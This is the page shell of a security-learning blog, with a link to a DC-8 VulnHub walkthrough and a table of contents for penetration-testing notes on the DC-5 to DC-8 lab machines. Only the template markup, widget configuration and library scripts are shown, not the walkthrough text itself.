<p><a href="https://www.hackingarticles.in/dc8-vulnhub-walkthrough/" target="_blank" rel="noopener">https://www.hackingarticles.in/dc8-vulnhub-walkthrough/</a></p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls"
                data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
            <ul id="audio-list" style="display:none">
                
                
                <li title='0' data-url='/knlvre.github.io/statics/forhim.mp3'></li>
                
                    
            </ul>
            
            
            
    <div id='gitalk-container' class="comment link"
        data-ae='true'
        data-ci='ec894e2b66f752e8b7fb'
        data-cs='3ccc2e92bb350688fe2c2dc2930189b62622bfb1'
        data-r='blog-comments'
        data-o='TriDiamond'
        data-a='TriDiamond'
        data-d=''
    >Comments</div>


            
            
        </div>
        <div class="sidebar">
            <div class="box animated fadeInRight">
                <div class="subbox">
                    <img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/ico/HaZong.jpg" height=300 width=300></img>
                    <p>Knlvre</p>
                    <span>Notes During Information Security Learning.</span>
                    <dl>
                        <dd><a href="https://github.com/knlvre" target="_blank"><span
                                    class=" iconfont icon-github"></span></a></dd>
                        <dd><a href="https://github.com/knlvre" target="_blank"><span
                                    class=" iconfont icon-twitter"></span></a></dd>
                        <dd><a href="https://github.com/knlvre" target="_blank"><span
                                    class=" iconfont icon-stack-overflow"></span></a></dd>
                    </dl>
                </div>
                <ul>
                    <li><a href="/">65 <p>Articles</p></a></li>
                    <li><a href="/categories">0 <p>Categories</p></a></li>
                    <li><a href="/tags">9 <p>Tags</p></a></li>
                </ul>
            </div>
            
            
            
            <div class="box sticky animated fadeInRight faster">
                <div id="toc" class="subbox">
                    <h4>Contents</h4>
                    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#DC-5"><span class="toc-number">2.</span> <span class="toc-text">DC-5</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#环境"><span class="toc-number">2.1.</span> <span class="toc-text">环境</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#渗透测试"><span class="toc-number">2.2.</span> <span class="toc-text">渗透测试</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#DC-6"><span class="toc-number">3.</span> <span class="toc-text">DC-6</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#环境-1"><span class="toc-number">3.1.</span> <span class="toc-text">环境</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#渗透测试-1"><span class="toc-number">3.2.</span> <span class="toc-text">渗透测试</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#DC-7"><span class="toc-number">4.</span> <span class="toc-text">DC-7</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#环境-2"><span class="toc-number">4.1.</span> <span class="toc-text">环境</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#渗透测试-2"><span class="toc-number">4.2.</span> <span class="toc-text">渗透测试</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#DC-8"><span class="toc-number">5.</span> <span class="toc-text">DC-8</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#环境-3"><span class="toc-number">5.1.</span> <span class="toc-text">环境</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#渗透测试-3"><span class="toc-number">5.2.</span> <span class="toc-text">渗透测试</span></a></li></ol></li></ol>
                </div>
            </div>
            
            
        </div>
    </div>
</div>

    </div>
</div>
    <div id="back-to-top" class="animated fadeIn faster">
        <div class="flow"></div>
        <span class="percentage animated fadeIn faster">0%</span>
        <span class="iconfont icon-top02 animated fadeIn faster"></span>
    </div>
</body>
<footer>
    <p class="copyright" id="copyright">
        &copy; 2019
        <span class="gradient-text">
            Knlvre
        </span>.
        Powered by <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a>
        Theme
        <span class="gradient-text">
            <a href="https://github.com/TriDiamond/hexo-theme-obsidian" title="Obsidian" target="_blank" rel="noopener">Obsidian</a>
        </span>
        <small><a href="https://github.com/TriDiamond/hexo-theme-obsidian/blob/master/CHANGELOG.md" title="v1.4.3" target="_blank" rel="noopener">v1.4.3</a></small>
    </p>
</footer>

<script type="text/javascript" src="https://cdn.bootcss.com/mathjax/2.7.6/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>
<script>
  MathJax.Hub.Config({
    "HTML-CSS": {
      preferredFont: "TeX",
      availableFonts: ["STIX", "TeX"],
      linebreaks: {
        automatic: true
      },
      EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50)
    },
    tex2jax: {
      inlineMath: [
        ["$", "$"],
        ["\\(", "\\)"]
      ],
      processEscapes: true,
      ignoreClass: "tex2jax_ignore|dno",
      skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
      noUndefined: {
        attributes: {
          mathcolor: "red",
          mathbackground: "#FFEEEE",
          mathsize: "90%"
        }
      },
      Macros: {
        href: "{}"
      }
    },
    messageStyle: "none"
  });
</script>
<script>
  function initialMathJax() {
    MathJax.Hub.Queue(function () {
      var all = MathJax.Hub.getAllJax(),
        i;
      // console.log(all);
      for (i = 0; i < all.length; i += 1) {
        console.log(all[i].SourceElement().parentNode)
        all[i].SourceElement().parentNode.className += ' has-jax';
      }
    });
  }

  function reprocessMathJax() {
    if (typeof MathJax !== 'undefined') {
      MathJax.Hub.Queue(["Typeset", MathJax.Hub]);
    }
  }
</script>



    <link rel="stylesheet" href="//cdn.bootcss.com/gitalk/1.5.0/gitalk.min.css">
    <script src="//cdn.bootcss.com/gitalk/1.5.0/gitalk.min.js"></script>

<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="/knlvre.github.io/js/plugin.js"></script>
<script src="/knlvre.github.io/js/obsidian.js"></script>
<script src="/knlvre.github.io/js/jquery.truncate.js"></script>
<script src="/knlvre.github.io/js/search.js"></script>
<script src="//cdn.bootcss.com/typed.js/2.0.10/typed.min.js"></script>
<script src="//cdn.bootcss.com/blueimp-md5/2.12.0/js/md5.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>

<script src="https://cdn.bootcss.com/codemirror/5.48.4/codemirror.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/javascript/javascript.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/css/css.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/xml/xml.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/htmlmixed/htmlmixed.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/clike/clike.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/php/php.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/shell/shell.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/python/python.min.js"></script>



    <script src="/knlvre.github.io/js/busuanzi.min.js"></script>
    <script>
        $(document).ready(function () {
            if ($('span[id^="busuanzi_"]').length) {
                initialBusuanzi();
            }
        });
    </script>


<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.css">
<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/default-skin/default-skin.min.css">
<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.js"></script>
<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe-ui-default.min.js"></script>

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>



    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async src="//www.googletagmanager.com/gtag/js?id=UA-149874671-1"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());

        gtag('config', 'UA-149874671-1');
    </script>





<script>
    function initialTyped () {
        var typedTextEl = $('.typed-text');
        if (typedTextEl && typedTextEl.length > 0) {
            var typed = new Typed('.typed-text', {
                strings: ["Notes During Information Security Learning.", "信息安全学习过程中的笔记。"],
                typeSpeed: 90,
                loop: true,
                loopCount: Infinity,
                backSpeed: 20,
            });
        }
    }

    if ($('.article-header') && $('.article-header').length) {
        $(document).ready(function () {
            initialTyped();
        });
    }
</script>




</html>
